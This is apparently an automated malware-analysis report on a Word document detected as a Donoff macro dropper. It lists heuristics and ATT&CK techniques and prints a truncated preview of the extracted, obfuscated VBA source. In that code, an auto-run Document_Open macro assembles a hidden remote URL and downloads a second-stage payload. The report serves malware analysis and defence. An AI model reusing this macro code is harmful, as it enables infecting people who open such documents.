Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open auto-execution macro, and triggers heuristics related to CreateObject and CallByName, indicating malicious code execution. ClamAV detection as 'Doc.Dropper.Donoff-5743527-0' strongly suggests this is a dropper for the Donoff family. The VBA code, though obfuscated, appears designed to download and execute a second-stage payload.
Heuristics (7)

- ClamAV: Doc.Dropper.Donoff-5743527-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call
- CallByName call [high, OLE_VBA_CALLBYNAME]: CallByName call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17405 bytes | 14bac9686e0b99bc8f67c412f84ecbfb273b6e6fbbb63d22e4e4916e4e70fb69 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ifQyqEqqDblDm(ByVal ZSQboaEkRIILQY As Integer) As String
JMQVpHmPk
loGAMtaHqQcvO 8198
If UWdiRl(8828, "vGyt") Then
jdqBvVjuiEuc
SjVAhISClD = 7276
SVymwhP 4905, ""
LewJnr
End If
SCgkFw = "4XhF"
ifQyqEqqDblDm = "JzyA"
End Function
Private Function biagNyvS() As Integer
VVLYA False
xrbvGxleYvcz 2233, "ppo"
acCCTuY
biagNyvS = 5204
End Function
Private Function rKCmnHimc() As String
If mnPPBLBkyuBEhM(9126) Then
UrtVlWavVO = 8634
GxjrAbSYzQSe
Else
RbOSWrcu True
OsADZMpKZzqv
adRqK
End If
onsqQYqtupKk = True
rKCmnHimc = "JcNpG"
End Function
Private Sub Document_Open()
UznIuUa.uCjoqU
End Sub
Private Function FlLwYm(ByVal Fcgzrb As String, ByVal OSrDQahyT As Integer) As Integer
TubKF 4374
llHsMi
FifoRtqC
If rYnfKvVbfdemW Then
akuUZZ
Else
gkimsowgZrJrM = "bZI"
bhJOHqSrBUvJL
BPiFeHWKwdE
End If
FlLwYm = 1337
End Function
Attribute VB_Name = "UznIuUa"
Private Function eHYfHP(ByVal CqJEWQ As Object, ByVal TwpfbFiqpKuMV As Boolean) As Object
Dim ncNYaoEuhmLkk As Integer
ZhasZeBqVjjoYo = False
Set eHYfHP = CqJEWQ
End Function
Public Sub uCjoqU()
On Error GoTo HHQHWx
aATetMR.hyosUqZ
soeWh = True
aATetMR.rYFLHQNkz
nwBIvl
Exit Sub
jkEkVjS = 5724
HHQHWx:
End Sub
Private Sub nwBIvl()
Dim OKsxmnsBid As String
Dim hSBRDrMA As Integer
PKYsuPdCLwre = ""
PJYIE 5737, YFOyyknzud.ewPkGfYACz, tqQmc
LSLtRpI = 6867
YFOyyknzud.VWCXhzkYCqX 6258, YFOyyknzud.ewPkGfYACz
End Sub
Public Function JTQin(ByVal qmNCbtemadOI As String) As Object
Dim tpEtMKrYQ As String
Dim UpcNKbeVnkTnk As Boolean
hXxGqkWh = "Eqrvz"
Set JTQin = eHYfHP(CreateObject(qmNCbtemadOI), True)
End Function
Private Function hvicUHmiexgCz(ByVal rJYPwsEUNWue As String) As Integer
If LTGzsDA(8404, "4Nw") Then
ylizpRfAtMIEdI = 7354
ojvmOdAUfxOpvP
SwQzaHA
jwTyuAkJpEOlL
bvtaRvXcBnuYs = "aQ"
Else
DAttwmJdBg
VbNrcXe "bKvuO", 4897
CfaFCV
End If
sXpmsIwCnBMVcl 4147, 3708, 9625
hvicUHmiexgCz = 2465
End Function
Private Sub PJYIE(ByVal BTECcx As Integer, ByVal fijOmBBXClSJ As String, ByVal sZieeU As String)
Dim imtqNWaAU As Integer
Set THTxvExUwwgpp = ojDLpfoamw.nBlvUb(sZieeU, 7913, True)
ojDLpfoamw.weTrVaHMDnwoBT "", csHhyD, 3895, THTxvExUwwgpp
ohbUVEThfDLTt = True
YFOyyknzud.NoBhwAKyFjpa 6655, IvRPLtYFWQ.UFgbWSdd(2621, THTxvExUwwgpp, "w5I", JgNKoM.HqxvxARBgU("R3eUgs/po3n3UsCeUBgodgyc", "rUg9cC/3")), "", fijOmBBXClSJ
End Sub
Private Function tqQmc() As String
tqQmc = JgNKoM.HqxvxARBgU("RhtXt5Gp:MM//GjncjRb5-jtrveGMnMdMsv.cGoMm5X/cRMatRXalvovgXv/oRf5fjGicvXeX1v2.RvdvaXt", "RvX5GjM")
End Function
Private Function csHhyD() As String
csHhyD = JgNKoM.HqxvxARBgU("TCTanTh'tSG d:ojwGunl8uoa:8d: bhi18nSar1y1L f:SiLlLe", "L8G:TjS1uh")
End Function
Attribute VB_Name = "JgNKoM"
Private Sub merSuu()
LvAdtjZofS False, 4187, False
EqPaBFHEhkEBj 3928, True, 3091
End Sub
Public Function gCLyYkPKvyx(ByVal kCcFfRlwjVN As String, ByVal BOMzkTEJiyvD As Boolean, ByVal vyMOdJr As String) As String
Dim hhyIwaoaIxyQ As Boolean
Dim PxuoHiev As Integer
DEXeVCNkOn = "tyyB"
gCLyYkPKvyx = kCcFfRlwjVN & vyMOdJr
End Function
Private Sub HZbUaXFnFLSbD()
jxXJYzl 3835, "", 8764
alLBqqzcRh 5484, 760, 7177
kBVgu = 3182
XaLLkuomjFpm
End Sub
Private Function lvZoEkOEiOOOFQ(ByVal fMoeiwLT As String, ByVal lRRIeLTfKX As String) As String
If Not PyjxsbeBtcX.nDaRCfpyGqRe("7bSB", lRRIeLTfKX, fMoeiwLT, "SEo") Then
lvZoEkOEiOOOFQ = lRRIeLTfKX
End If
End Function
Private Function VpICRpgOLpxt() As Integer
txJQf = ""
VpICRpgOLpxt = 1
End Function
Public Function HqxvxARBgU(ByVal ehrRfcjDg As String, ByVal xADwMEqNENb As String) As String
Dim lGjdVGh As String
Dim GUQWqYftlrTi As String
Dim okvwVzope As Integer
For PwCPI = VpICRpgOLpxt To PyjxsbeBtcX.GQIxrG(ehrRfcjDg)
lGjdVGh = lvZoEkOEiOOOFQ(xADwMEqNENb, PyjxsbeBtcX.Hu
... (truncated)